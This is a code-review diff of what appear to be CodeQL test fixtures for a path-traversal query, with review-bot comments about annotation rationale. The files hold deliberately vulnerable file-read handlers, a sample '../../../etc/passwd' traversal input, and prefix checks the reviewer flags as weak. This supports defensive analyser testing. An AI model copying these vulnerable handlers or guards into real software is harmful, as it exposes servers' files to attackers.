res.write(fs.readFileSync(require("querystringify").parse(req.url).query)); // NOT OK - res.write(fs.readFileSync(require("query-string").parse(req.url).query)); // NOT OK - res.write(fs.readFileSync(require("querystring").parse(req.url).query)); // NOT OK + res.write(fs.readFileSync(require("querystringify").parse(req.url).query)); // $ Alert + res.write(fs.readFileSync(require("query-string").parse(req.url).query)); // $ Alert + res.write(fs.readFileSync(require("querystring").parse(req.url).query)); // $ Alert }); (function(){ @@ -72,7 +61,7 @@ var server = http.createServer(function(req, res) { var express = require('express'); var application = express(); - var views_local = (req, res) => res.render(req.params[0]); + var views_local = (req, res) => res.render(req.params[0]); // $ Alert application.get('/views/*', views_local); var views_imported = require("./views"); @@ -81,12 +70,12 @@ var server = http.createServer(function(req, res) { })(); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - res.write(fs.readFileSync(fs.realpathSync(path))); + res.write(fs.readFileSync(fs.realpathSync(path))); // $ Alert fs.realpath(path, function(err, realpath){ - res.write(fs.readFileSync(realpath)); + res.write(fs.readFileSync(realpath)); // $ Alert } ); @@ -100,7 +89,7 @@ var server = http.createServer(function(req, res) { path = path.replace(/\.\./g, ''); // remove all ".." } - res.write(fs.readFileSync(path)); // OK. Is sanitized above. + res.write(fs.readFileSync(path)); // OK - Is sanitized above. }); var server = http.createServer(function(req, res) { 
@@ -113,70 +102,70 @@ var server = http.createServer(function(req, res) { path = path.replace(/\.\./g, ''); // remove all ".." } - res.write(fs.readFileSync(path)); // OK. Is sanitized above. + res.write(fs.readFileSync(path)); // OK - Is sanitized above. }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - require('send')(req, path); // NOT OK + require('send')(req, path); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var split = path.split("/"); - fs.readFileSync(split.join("/")); // NOT OK + fs.readFileSync(split.join("/")); // $ Alert - fs.readFileSync(prefix + split[split.length - 1]) // OK + fs.readFileSync(prefix + split[split.length - 1]) - fs.readFileSync(split[x]) // NOT OK - fs.readFileSync(prefix + split[x]) // NOT OK + fs.readFileSync(split[x]) // $ Alert + fs.readFileSync(prefix + split[x]) // $ Alert var concatted = prefix.concat(split); - fs.readFileSync(concatted.join("/")); // NOT OK + fs.readFileSync(concatted.join("/")); // $ Alert var concatted2 = split.concat(prefix); - fs.readFileSync(concatted2.join("/")); // NOT OK + fs.readFileSync(concatted2.join("/")); // $ Alert - fs.readFileSync(split.pop()); // NOT OK + fs.readFileSync(split.pop()); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source // Removal of forward-slash or dots. - res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); // OK. 
- res.write(fs.readFileSync(path.replace(/[abcd]/g, ''))); // NOT OK - res.write(fs.readFileSync(path.replace(/[./]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/[foobar/foobar]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\//g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\.|\//g, ''))); // OK - - res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/\./g, ''))); // NOT OK (can be absolute) - res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync(path.replace(/[\]\[*,;'"`<>\\?\/]/g, ''))); + res.write(fs.readFileSync(path.replace(/[abcd]/g, ''))); // $ Alert + res.write(fs.readFileSync(path.replace(/[./]/g, ''))); + res.write(fs.readFileSync(path.replace(/[foobar/foobar]/g, ''))); + res.write(fs.readFileSync(path.replace(/\//g, ''))); + res.write(fs.readFileSync(path.replace(/\.|\//g, ''))); + + res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/\./g, ''))); // $ Alert - can be absolute + res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // $ Alert - can be absolute if (!pathModule.isAbsolute(path)) { - res.write(fs.readFileSync(path.replace(/[.]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/[..]/g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\./g, ''))); // OK - res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); // OK + res.write(fs.readFileSync(path.replace(/[.]/g, ''))); + res.write(fs.readFileSync(path.replace(/[..]/g, ''))); + res.write(fs.readFileSync(path.replace(/\./g, ''))); + res.write(fs.readFileSync(path.replace(/\.\.|BLA/g, ''))); } // removing of "../" from prefix. 
- res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.[\/\\])+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)+/, ''))); // OK - res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)*/, ''))); // OK + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.[\/\\])+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)+/, ''))); + res.write(fs.readFileSync("prefix" + pathModule.normalize(path).replace(/(\.\.\/)*/, ''))); - res.write(fs.readFileSync("prefix" + path.replace(/^(\.\.[\/\\])+/, ''))); // NOT OK - not normalized - res.write(fs.readFileSync(pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync("prefix" + path.replace(/^(\.\.[\/\\])+/, ''))); // $ Alert - not normalized + res.write(fs.readFileSync(pathModule.normalize(path).replace(/^(\.\.[\/\\])+/, ''))); // $ Alert - can be absolute }); import normalizeUrl from 'normalize-url'; 
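Review bot: The lines that are expected to stay alert-free in this hunk lose their `// OK` marker entirely, for example `fs.readFileSync(prefix + split[split.length - 1])` and `path.replace(/[foobar/foobar]/g, '')`, whereas the first hunk of this file converts `GOOD:` into `// OK - …`. A line with no annotation reads the same as one nobody has classified, so a reader cannot tell that the sanitizer coverage is intentional. I would keep a short trailing reason, such as `// OK - only the last segment is used` on the split case and `// OK - character class includes '/'` on the replace case (presumably the reason these are treated as safe). The same applies to the two unannotated `new RegExp("[.]", …)` lines under `!pathModule.isAbsolute(path)` in the `@@ -184,38 +173,38 @@` hunk.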
@@ -184,38 +173,38 @@ import normalizeUrl from 'normalize-url'; var server = http.createServer(function(req, res) { // tests for a few more uri-libraries const qs = require("qs"); - res.write(fs.readFileSync(qs.parse(req.url).foo)); // NOT OK - res.write(fs.readFileSync(qs.parse(normalizeUrl(req.url)).foo)); // NOT OK + res.write(fs.readFileSync(qs.parse(req.url).foo)); // $ Alert + res.write(fs.readFileSync(qs.parse(normalizeUrl(req.url)).foo)); // $ Alert const parseqs = require("parseqs"); - res.write(fs.readFileSync(parseqs.decode(req.url).foo)); // NOT OK + res.write(fs.readFileSync(parseqs.decode(req.url).foo)); // $ Alert }); const cp = require("child_process"); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; - cp.execSync("foobar", {cwd: path}); // NOT OK - cp.execFileSync("foobar", ["args"], {cwd: path}); // NOT OK - cp.execFileSync("foobar", {cwd: path}); // NOT OK + let path = url.parse(req.url, true).query.path; // $ Source + cp.execSync("foobar", {cwd: path}); // $ Alert + cp.execFileSync("foobar", ["args"], {cwd: path}); // $ Alert + cp.execFileSync("foobar", {cwd: path}); // $ Alert }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source // Removal of forward-slash or dots. - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); // OK - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", ''), ''))); // NOT OK. - res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", unknownFlags()), ''))); // OK -- Might be okay depending on what unknownFlags evaluates to. 
+ res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", 'g'), ''))); + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", ''), ''))); // $ Alert + res.write(fs.readFileSync(path.replace(new RegExp("[\\]\\[*,;'\"`<>\\?/]", unknownFlags()), ''))); // OK - Might be okay depending on what unknownFlags evaluates to. }); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // NOT OK (can be absolute) + res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // $ Alert - can be absolute if (!pathModule.isAbsolute(path)) { - res.write(fs.readFileSync(path.replace(new RegExp("[.]", ''), ''))); // NOT OK - res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); // OK - res.write(fs.readFileSync(path.replace(new RegExp("[.]", unknownFlags()), ''))); // OK + res.write(fs.readFileSync(path.replace(new RegExp("[.]", ''), ''))); // $ Alert + res.write(fs.readFileSync(path.replace(new RegExp("[.]", 'g'), ''))); + res.write(fs.readFileSync(path.replace(new RegExp("[.]", unknownFlags()), ''))); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.qlref b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.qlref index 53d53cb8dc54..ff3d54b0cd56 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.qlref @@ -1 +1,2 @@ -Security/CWE-022/TaintedPath.ql +query: Security/CWE-022/TaintedPath.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js index 1fdbef68c47e..568269866f5f 100644 
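Review bot: The second `unknownFlags()` case, `new RegExp("[.]", unknownFlags())` inside the `!pathModule.isAbsolute(path)` block, loses its `// OK` marker, while the first one in this hunk keeps `// OK - Might be okay depending on what unknownFlags evaluates to.` Without the `g` flag, `replace` strips only the first match, which is why the neighbouring `''`-flags line is `$ Alert`. The missing alert here is therefore an assumption about the flags, not evidence that the path is safe. I would keep that visible on the line, e.g. `// OK - flags unknown; assumed to include 'g'`.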
--- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPath.js @@ -5,8 +5,7 @@ const fs = require('fs'), const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { - let filePath = url.parse(req.url, true).query.path; + let filePath = url.parse(req.url, true).query.path; // $ Source - // BAD: This function uses unsanitized input that can read any file on the file system. - res.write(fs.readFileSync(ROOT + filePath, 'utf8')); + res.write(fs.readFileSync(ROOT + filePath, 'utf8')); // $ Alert - This function uses unsanitized input that can read any file on the file system. }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js index ac8dd4fb9ba8..5b497cfddccb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/examples/TaintedPathGood.js @@ -8,7 +8,7 @@ const ROOT = "/var/www/"; var server = http.createServer(function(req, res) { let filePath = url.parse(req.url, true).query.path; - // GOOD: Verify that the file path is under the root directory + // OK - Verify that the file path is under the root directory filePath = fs.realpathSync(path.resolve(ROOT, filePath)); if (!filePath.startsWith(ROOT)) { res.statusCode = 403; diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/express.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/express.js index dad320e3abae..13c6ad082abe 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/express.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/express.js 
@@ -5,5 +5,5 @@ let app = express(); app.use(fileUpload()); app.get("/some/path", function (req, res) { - req.files.foo.mv(req.query.bar); + req.files.foo.mv(req.query.bar); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js index 512b851592aa..ffbeb5a767ba 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/handlebars.js @@ -8,11 +8,11 @@ const data = {}; function init() { hb.registerHelper("catFile", function catFile(filePath) { - return fs.readFileSync(filePath); // SINK (reads file) + return fs.readFileSync(filePath); // $ Alert }); hb.registerHelper("prependToLines", function prependToLines(prefix, filePath) { return fs - .readFileSync(filePath) + .readFileSync(filePath) // $ Alert .split("\n") .map((line) => prefix + line) .join("\n"); 
@@ -26,27 +26,27 @@ function init() { init(); app.get('/some/path1', function (req, res) { - res.send(data.compiledFileAccess({ path: req.params.path })); // NOT ALLOWED (template uses vulnerable catFile) + res.send(data.compiledFileAccess({ path: req.params.path })); // $ Source - template uses vulnerable catFile }); app.get('/some/path2', function (req, res) { - res.send(data.compiledBenign({ name: req.params.name })); // ALLOWED (this template does not use catFile) + res.send(data.compiledBenign({ name: req.params.name })); // OK - this template does not use catFile }); app.get('/some/path3', function (req, res) { - res.send(data.compiledUnknown({ name: req.params.name })); // ALLOWED (could be using a vulnerable helper, but we'll assume it's ok) + res.send(data.compiledUnknown({ name: req.params.name })); // OK - could be using a vulnerable helper, but we'll assume it's ok }); app.get('/some/path4', function (req, res) { res.send(data.compiledMixed({ prefix: ">>> ", - path: req.params.path // NOT ALLOWED (template uses vulnerable helper) + path: req.params.path // $ Source - template uses vulnerable helper })); }); app.get('/some/path5', function (req, res) { res.send(data.compiledMixed({ - prefix: req.params.prefix, // ALLOWED (this parameter is safe) + prefix: req.params.prefix, // OK - this parameter is safe path: "data/path-5.txt" })); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js index 4fa6b3f50d54..4365de77a40f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/normalizedPaths.js 
@@ -8,98 +8,98 @@ var fs = require('fs'), let app = express(); app.get('/basic', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source - fs.readFileSync(path); // NOT OK - fs.readFileSync('./' + path); // NOT OK - fs.readFileSync(path + '/index.html'); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK - fs.readFileSync(pathModule.join('/home/user/www', path)); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync('./' + path); // $ Alert + fs.readFileSync(path + '/index.html'); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert + fs.readFileSync(pathModule.join('/home/user/www', path)); // $ Alert }); app.get('/normalize', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source - fs.readFileSync(path); // NOT OK - fs.readFileSync('./' + path); // NOT OK - fs.readFileSync(path + '/index.html'); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK - fs.readFileSync(pathModule.join('/home/user/www', path)); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync('./' + path); // $ Alert + fs.readFileSync(path + '/index.html'); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert + fs.readFileSync(pathModule.join('/home/user/www', path)); // $ Alert }); app.get('/normalize-notAbsolute', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.startsWith(".")) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity if (!path.startsWith("..")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (!path.startsWith("../")) - fs.readFileSync(path); 
// OK + fs.readFileSync(path); if (!path.startsWith(".." + pathModule.sep)) - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/normalize-noInitialDotDot', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (path.startsWith("..")) return; - fs.readFileSync(path); // NOT OK - could be absolute + fs.readFileSync(path); // $ Alert - could be absolute fs.readFileSync("./" + path); // OK - coerced to relative - fs.readFileSync(path + "/index.html"); // NOT OK - not coerced + fs.readFileSync(path + "/index.html"); // $ Alert - not coerced if (!pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/prepend-normalize', (req, res) => { // Coerce to relative prior to normalization - let path = pathModule.normalize('./' + req.query.path); + let path = pathModule.normalize('./' + req.query.path); // $ Source if (!path.startsWith("..")) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/absolute', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source if (!pathModule.isAbsolute(path)) return; - res.write(fs.readFileSync(path)); // NOT OK + res.write(fs.readFileSync(path)); // $ Alert if (path.startsWith('/home/user/www')) - res.write(fs.readFileSync(path)); // NOT OK - can still contain '../' + res.write(fs.readFileSync(path)); // $ Alert - can still contain '../' }); app.get('/normalized-absolute', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (!pathModule.isAbsolute(path)) return; - res.write(fs.readFileSync(path)); // NOT OK + res.write(fs.readFileSync(path)); // $ Alert if (path.startsWith('/home/user/www')) - res.write(fs.readFileSync(path)); // OK 
+ res.write(fs.readFileSync(path)); }); app.get('/combined-check', (req, res) => { 
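Review bot: In `/normalized-absolute` the read under `path.startsWith('/home/user/www')` becomes an unannotated line, i.e. an expected non-alert, but the guard is a plain string prefix with no trailing separator. A normalized absolute path into a sibling directory whose name merely starts with `www` would satisfy it too. The same shape is accepted in `/combined-check`, `/realpath` and `/coerce-absolute` in the next hunk, and through `abs.indexOf(root) !== 0` and `allowPath` in `/yet-another-prefix` and `/yet-another-prefix2` further down. If treating any constant-prefix check as a barrier is intentional, a comment on these lines would stop the test being read as a sanitizer recipe: `// no alert expected: prefix guard accepted as a barrier; it does not enforce a separator boundary`.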
@@ -107,71 +107,71 @@ app.get('/combined-check', (req, res) => { // Combined absoluteness and folder check in one startsWith call if (path.startsWith("/home/user/www")) - fs.readFileSync(path); // OK + fs.readFileSync(path); if (path[0] !== "/" && path[0] !== ".") - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/realpath', (req, res) => { - let path = fs.realpathSync(req.query.path); + let path = fs.realpathSync(req.query.path); // $ Source - fs.readFileSync(path); // NOT OK - fs.readFileSync(pathModule.join(path, 'index.html')); // NOT OK + fs.readFileSync(path); // $ Alert + fs.readFileSync(pathModule.join(path, 'index.html')); // $ Alert if (path.startsWith("/home/user/www")) fs.readFileSync(path); // OK - both absolute and normalized before check fs.readFileSync(pathModule.join('.', path)); // OK - normalized and coerced to relative - fs.readFileSync(pathModule.join('/home/user/www', path)); // OK + fs.readFileSync(pathModule.join('/home/user/www', path)); }); app.get('/coerce-relative', (req, res) => { - let path = pathModule.join('.', req.query.path); + let path = pathModule.join('.', req.query.path); // $ Source if (!path.startsWith('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/coerce-absolute', (req, res) => { - let path = pathModule.join('/home/user/www', req.query.path); + let path = pathModule.join('/home/user/www', req.query.path); // $ Source if (path.startsWith('/home/user/www')) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/concat-after-normalization', (req, res) => { - let path = 'foo/' + pathModule.normalize(req.query.path); + let path = 'foo/' + pathModule.normalize(req.query.path); // $ Source if (!path.startsWith('..')) - fs.readFileSync(path); // NOT OK - prefixing foo/ invalidates check + fs.readFileSync(path); // $ 
Alert - prefixing foo/ invalidates check else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.includes('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); }); app.get('/noDotDot', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (path.includes('..')) return; - fs.readFileSync(path); // NOT OK - can still be absolute + fs.readFileSync(path); // $ Alert - can still be absolute if (!pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert }); app.get('/join-regression', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source // Regression test for a specific corner case: // Some guard nodes sanitize both branches, but for a different set of flow labels. 
@@ -181,191 +181,191 @@ app.get('/join-regression', (req, res) => { if (path.startsWith('/x')) {path;} else {path;} if (path.startsWith('.')) {path;} else {path;} - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (pathModule.isAbsolute(path)) - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (path.includes('..')) - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.includes('..') && !pathModule.isAbsolute(path)) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert let normalizedPath = pathModule.normalize(path); if (normalizedPath.startsWith('/home/user/www')) - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); else - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert if (normalizedPath.startsWith('/home/user/www') || normalizedPath.startsWith('/home/user/public')) - fs.readFileSync(normalizedPath); // OK - but flagged anyway [INCONSISTENCY] + fs.readFileSync(normalizedPath); // $ SPURIOUS: Alert else - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert }); app.get('/decode-after-normalization', (req, res) => { - let path = pathModule.normalize(req.query.path); + let path = pathModule.normalize(req.query.path); // $ Source if (!pathModule.isAbsolute(path) && !path.startsWith('..')) - fs.readFileSync(path); // OK + fs.readFileSync(path); path = decodeURIComponent(path); if (!pathModule.isAbsolute(path) && !path.startsWith('..')) - fs.readFileSync(path); // NOT OK - not normalized + fs.readFileSync(path); // $ Alert - not normalized }); app.get('/replace', (req, res) => { - let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); + let path = 
pathModule.normalize(req.query.path).replace(/%20/g, ' '); // $ Source if (!pathModule.isAbsolute(path)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert path = path.replace(/\.\./g, ''); - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); app.get('/resolve-path', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var self = something(); if (path.substring(0, self.dir.length) === self.dir) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity if (path.slice(0, self.dir.length) === self.dir) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity }); app.get('/relative-startswith', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var self = something(); var relative = pathModule.relative(self.webroot, path); if(relative.startsWith(".." + pathModule.sep) || relative == "..") { - fs.readFileSync(path); // NOT OK! + fs.readFileSync(path); // $ Alert } else { - fs.readFileSync(path); // OK! + fs.readFileSync(path); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (relativePath.indexOf('..' + pathModule.sep) === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! 
+ fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (relativePath.indexOf('../') === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (pathModule.normalize(relativePath).indexOf('../') === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (pathModule.normalize(relativePath).indexOf('../')) { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } else { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } }); var isPathInside = require("is-path-inside"), pathIsInside = require("path-is-inside"); app.get('/pseudo-normalizations', (req, res) => { - let path = req.query.path; - fs.readFileSync(path); // NOT OK + let path = req.query.path; // $ Source + fs.readFileSync(path); // $ Alert if (isPathInside(path, SAFE)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); return; } else { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (pathIsInside(path, SAFE)) { - fs.readFileSync(path); // NOT OK - can be of the form 'safe/directory/../../../etc/passwd' + fs.readFileSync(path); // $ Alert - can be of the form 'safe/directory/../../../etc/passwd' return; } else { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } let normalizedPath = pathModule.join(SAFE, path); if (pathIsInside(normalizedPath, SAFE)) { - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); return; } else { - 
fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert } if (pathIsInside(normalizedPath, SAFE)) { - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); return; } else { - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert } }); app.get('/yet-another-prefix', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var abs = pathModule.resolve(path); if (abs.indexOf(root) !== 0) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert return; } - fs.readFileSync(path); // OK + fs.readFileSync(path); }); var rootPath = process.cwd(); app.get('/yet-another-prefix2', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var requestPath = pathModule.join(rootPath, path); var targetPath; if (!allowPath(requestPath, rootPath)) { targetPath = rootPath; - fs.readFileSync(requestPath); // NOT OK + fs.readFileSync(requestPath); // $ Alert } else { targetPath = requestPath; - fs.readFileSync(requestPath); // OK + fs.readFileSync(requestPath); } - fs.readFileSync(targetPath); // OK + fs.readFileSync(targetPath); function allowPath(requestPath, rootPath) { return requestPath.indexOf(rootPath) === 0; 
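Review bot: The `// $ SPURIOUS: Alert` in `/join-regression`, on the read guarded by `normalizedPath.startsWith('/home/user/www') || normalizedPath.startsWith('/home/user/public')`, records a known false positive without giving a reason. It also drops the old comment's statement that the line is actually safe. Judging from the single-guard case just above it, which expects no alert, it looks like the disjunction of two prefix guards is not recognised as a barrier. Stating that would keep the expectation from later being "fixed" in the wrong direction: `// $ SPURIOUS: Alert - safe; the || of two startsWith guards is not recognised as a barrier`.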
